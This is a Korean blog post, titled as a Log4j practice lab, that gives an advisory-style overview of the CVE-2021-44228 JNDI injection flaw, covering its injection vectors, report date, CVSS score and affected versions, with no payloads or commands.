Log4j (CVE-2021-44228) 실습

Log4j (CVE-2021-44228) 실습

[개요]

CVE-2021-44228 is a remote code execution (RCE) vulnerability in Apache Log4j 2.

An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. The crafted request uses a Java Naming and Directory Interface (JNDI) injection via a variety of services including:

- Lightweight Directory Access Protocol (LDAP)

- Secure LDAP (LDAPS)

- Remote Method Invocation (RMI)

- Domain Name Service (DNS)

If the vulnerable server uses log4j to log requests, the exploit will then request a malicious payload over JNDI through one of the services above from an attacker-controlled server.

Successful exploitation could lead to RCE.

In the case of Minecraft, users were able to exploit this vulnerability by sending a specially crafted message through Minecraft chat.

(참고 : https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability)

Log4j는 Apache Software Foundation에서 개발한

Java Logging Framework로, 프로그램을 작성하는 도중

로그를 남기기 위해 사용되는 Java 기반의 로깅 유틸리티

2021년 11월 24일

Alibaba Cloud 보안 팀이

Apache Log4j RCE (Remote Code Execution)

취약점을 Apache에 공식 보고 후

CVE-2021-44228

CVSS 스코어 10점

해당 취약점은

Log4j 2 중에 존재하는 JNDI(Java Naming and Directory Interface)

Injection 취약점으로, 이를 악용하면 RCE가 가능하게 됨

보안이 취약한 제품 버전 :

Apache Log4j 2.0-beta9 ~ 2.14.1 모든버전

from http://takudaddy.tistory.com/483 by ccl(A) rewrite - 2021-12-14 01:28:04